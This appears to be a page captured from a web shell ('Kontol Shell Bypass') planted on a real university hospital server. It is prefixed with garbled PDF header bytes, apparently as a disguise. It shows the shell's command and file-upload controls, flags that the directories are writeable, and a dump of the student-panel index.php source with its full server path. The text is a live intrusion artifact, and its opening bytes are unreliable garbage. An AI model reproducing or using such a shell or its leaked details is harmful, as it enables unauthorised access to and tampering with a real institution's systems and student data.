%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/student-panel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/student-panel/index.php
<?php
	error_reporting(0);
	if(strpos($_SERVER['HTTP_HOST'],'localhost')!==FALSE){
		$protocol='http://';
    }else if(strpos($_SERVER['HTTP_HOST'],'arwadigital')!==FALSE){
		$protocol='http://';
	}else{
        $protocol='https://';
	}
	
	$url=$protocol.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
	
	$cdir=getcwd();
	$cdir=explode(DIRECTORY_SEPARATOR, $cdir);
	$cdir=end($cdir);
	$a=explode("/".$cdir, $url);
	$rootUrl=$a[0]."/";
	$baseUrl=$a[0]."/".$cdir."/";

	$fbaseUrl=$_GET['url']?base64_decode($_GET['url']):$baseUrl;

	$gaCodeHead=file_get_contents($baseUrl.'api/lpage/gaCodeHead');
	$gaCodeBody=file_get_contents($baseUrl.'api/lpage/gaCodeBody');
	$gaCodeKey=file_get_contents($baseUrl.'api/lpage/gaCodeKey');
?>

<!DOCTYPE html>
<html lang="en" ng-app="MetronicApp" ng-controller="App">
<head>
	<meta charset="utf-8" />
	<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Expires" content="0"/>
	
	<base href="<?php echo $fbaseUrl?>" />
	<link rel="apple-touch-icon" sizes="76x76" href="<?php echo $baseUrl?>assets/img/apple-icon.png">
	<link rel="icon" type="image/png" sizes="96x96" href="<?php echo $baseUrl?>assets/img/favicon.png">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<title ng-bind="PageTitle">Student Panel | Sharda University</title>
	<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />
    <meta name="viewport" content="width=device-width" />    
	<link rel="icon" href="<?php echo $baseUrl?>images/favicon.png" type="image/x-icon" />
	
    <link href="<?php echo $baseUrl?>css/bootstrap.min.css" rel="stylesheet" />
    <link href="<?php echo $baseUrl?>css/style.css?1.01" rel="stylesheet"/>
    
	<link rel="stylesheet" href="<?php echo $baseUrl?>css/font-awesome.min.css" />
    <!--<link href='https://fonts.googleapis.com/css?family=Muli:400,300' rel='stylesheet' type='text/css'>-->

	<!-- Sat -->
	<link href="<?php echo $baseUrl?>app-theme/plugins/jquery-ui/jquery-ui.min.css" rel="stylesheet" />
	<link href="<?php echo $baseUrl?>app-theme/css/style.css?<?php echo time()?>" rel="stylesheet" />
	<style type="text/css">
        .bodycover		{position:fixed; z-index:11002; width:100%; height:100%; left:0; top:0; background:#888; opacity:0.2}
        .ajaxloader		{width:60px; height:50px; line-height:50px; text-align:center; border:1px solid #8E44AD; border-radius:2px; position:fixed; z-index:11003; left:calc(50% - 30px); /*top:50%; transform: translateY(-50%);*/ top:30%; background:#eee; color:#555; font-size:30px;}
		
		.appfeeshow{display:block}
		.appfeehide{display:none}
		@media (max-width:768px) {
			.appfeeshow{display:none}
			.appfeehide{display:block}
		}
		/* .form-control[readonly] {
			background-color: #fff !important;
		} */
    </style>
	<!-- / -->

	<!-- Sat -->
	<script>
		var rootUrl="<?php echo $rootUrl?>";
		var baseUrl="<?php echo $baseUrl?>";
		var VERSION='<?php echo time()?>';
        var SITE_NAME="Student Dashboard";
        var API_URL=baseUrl+'api/';
		var gaKey='<?php echo $gaCodeKey;?>';
	</script>
	<!-- / -->
	<?php echo $gaCodeHead;?>
</head>
<body style="visibility:hidden">
	<?php echo $gaCodeBody;?>
	<!-- Preloader-->
    <div class="bodycover"></div><div class="ajaxloader"><i class="fa fa-spin fa-circle-o-notch"></i></div>
	<!-- / -->
	
	<div class="wrapper">
		<!--<div class="sidebar" data-background-color="white" data-active-color="danger" ng-if="isLogged">-->
		<div class="sidebar" data-background-color="white" data-active-color="danger" ng-hide="hideSidebar">
			<div ng-include="'<?php echo $baseUrl?>views/tpl/sidebar.html?v3.16'" ng-controller="SidebarController"></div>
		</div>
		<div class="sidebar sidebar2" data-background-color="white" data-active-color="danger" ng-if="!isLogged">
			<div ng-include="'<?php echo $baseUrl?>views/tpl/sidebar_login.html?<?php echo time()?>'"></div>
		</div>

		<div class="main-panel {{!isLogged?'main-panel2':''}} {{hideSidebar?'main-panel3':''}}">
			<nav class="navbar navbar-default" ng-hide="hideSidebar" ng-include="'<?php echo $baseUrl?>views/tpl/nav.html?<?php echo time()?>'"></nav>

			<div ui-view class="content animate-view"><!-- Main content --></div>

			<footer class="footer" ng-include="'<?php echo $baseUrl?>views/tpl/footer.html?<?php echo time()?>'"></footer>
		</div>
	</div>

	<!-- Alert Msg Modal -->
    <div class="modal fade" id="alertMsgModal" tabindex="-1" role="dialog" aria-hidden="true">
		<div class="modal-dialog">
			<div class="modal-content text-center">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
					<h4 class="modal-title"></h4>
				</div>
				<div class="modal-body">
				</div>
				
				<!--<div class="modal-footer">
					<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
				</div>-->
			</div>
		</div>
	</div>

	<!--popup-->
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div id="myModal2" class="modal fade" role="dialog">
					<div class="modal-dialog">
						<!-- Modal content-->
						<div class="modal-content">
							<div class="modal-header">
								<button type="button" class="close" data-dismiss="modal">&times;</button>
								<h4 class="modal-title">Privacy Policy</h4>
							</div>
							<div class="modal-body">
								<p>Your personal information (Name, Email, State, Phone, Courses, specialization) submitted will not be sold, shared or rented to others. We use this information to send updates about the University, courses being offered and contact you, if requested or find it necessary. You may opt out of receiving our communication by calling us on the contact number or by clicking on the 'unsubscribe' link mentioned in the mails.</p>
							</div>
							<div class="modal-footer">
								<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
							</div>
						</div>
					</div>
				</div>
				<div id="myModal3" class="modal fade" role="dialog">
				<div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					<div class="modal-header">
						<button type="button" class="close" data-dismiss="modal">&times;</button>
						<h4 class="modal-title">Terms and Conditions</h4>
					</div>
					<div class="modal-body">
						<p>Application fee of SUAT is INR 1500/-, failing which your application will not be considered. The application fee is non-refundable. All offers available on the site are for limited period only. Before availing any offer please note its end date. Please note that the application fee, offers and last date for applying is at the discretion of Sharda University and can be altered at any time. Any changes, if may happen, shall be informed through the Universities website. Applicant must check the eligibility criteria before applying, failing which the application will not be considered. All the details entered by the applicant (including academic details) should be correct. At any later stage of the process, if it is found that details are fake, the applicant will be barred from admission to Sharda University. All admission to Sharda University will be through SUAT (Sharda University Admission test) only. Applicants are therefore requested not to entertain any third party claiming to provide admission in Sharda University. The System ID sent to the applicant should be kept handy for SUAT and further admission process.</p>
					</div>
					<div class="modal-footer">
						<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
					</div>
					</div>
				</div>
				</div>
				<div id="myModal4" class="modal fade" role="dialog">
				<div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					<div class="modal-header">
						<button type="button" class="close" data-dismiss="modal">&times;</button>
						<h4 class="modal-title">Cashback Offer</h4>
					</div>
					<div class="modal-body">
						<ul class="cashback">
							<li>The candidates who have made the payment of INR 1200 as application fee are eligible to receive INR 200 Paytm Voucher.</li>
							<li>Paytm voucher will be sent on your registered Email ID and Mobile Number on or after 1st June 2018.</li>
							<li>Paytm Voucher cannot be redeemed for cash. No credit or change will be given on the unused portion of the Voucher.</li>
							<li>We are not responsible if the Paytm voucher sent to you is lost, stolen or used by someone else.</li>
							<li>Last date to avail the offer is 30 May 2018.</li>
						</ul>
					</div>
					</div>
				</div>
				</div> 		
			</div>
		</div>
	</div>
	<!--popup-end-->

	<!-- Core JS Files -->
    <script src="<?php echo $baseUrl?>js/jquery.min.js" type="text/javascript"></script>
	<script src="https://www.gstatic.com/firebasejs/8.2.3/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.2.3/firebase-auth.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.2.3/firebase-database.js"></script>

	<script src="<?php echo $rootUrl?>js/fbase/fbase.js"></script>

	<script src="<?php echo $baseUrl?>js/bootstrap.min.js" type="text/javascript"></script>
	<script src="<?php echo $baseUrl?>app-theme/plugins/bootbox/bootbox.all.min.js" type="text/javascript"></script>

	<script src="<?php echo $baseUrl?>js/paper-dashboard.js"></script>
	
	<script src="<?php echo $baseUrl?>app-theme/plugins/jquery-ui/jquery-ui.min.js"></script>
	<!-- Angular JS -->
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular.min.js"></script>
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular-ui-router.min.js"></script>
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular-animate.min.js"></script>
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/ocLazyLoad.min.js"></script>
	
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/angulartics.min.js"></script>
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/angulartics-ga.min.js"></script>

    <script src="<?php echo $baseUrl?>app-js/config.js?<?php echo time()?>"></script>
	<script src="<?php echo $baseUrl?>app-js/url_route.js?<?php echo time()?>"></script>
	
	<!-- Other JS -->
	<script src="<?php echo $baseUrl?>app-theme/js/moment.min.js"></script>
    <script src="<?php echo $baseUrl?>app-js/util.js?<?php echo time()?>"></script>
    <script src="<?php echo $baseUrl?>app-js/validation.js?<?php echo time()?>"></script>
    <script src="<?php echo $baseUrl?>app-js/site.js?<?php echo time()?>"></script>

    <!-- AngularJs Controllers -->
	<script src="<?php echo $baseUrl?>app-js/app.js?<?php echo time()?>"></script>
	<script src="<?php echo $baseUrl?>app-js/register_login.js?<?php echo time()?>"></script>
	<script src="<?php echo $baseUrl?>app-js/dashboard.js?<?php echo time()?>"></script>
	<script src="<?php echo $baseUrl?>app-js/user.js?<?php echo time()?>"></script>
	<script src="<?php echo $baseUrl?>app-js/application.js?<?php echo time()?>"></script>
    <script src="<?php echo $baseUrl?>app-js/registration.js?<?php echo time()?>"></script>
    
    <script src="<?php echo $baseUrl?>app-js/adm_form.js?<?php echo time()?>"></script>
    <script src="<?php echo $baseUrl?>app-js/phd_form.js?<?php echo time()?>"></script>
</body>
</html>

Kontol Shell Bypass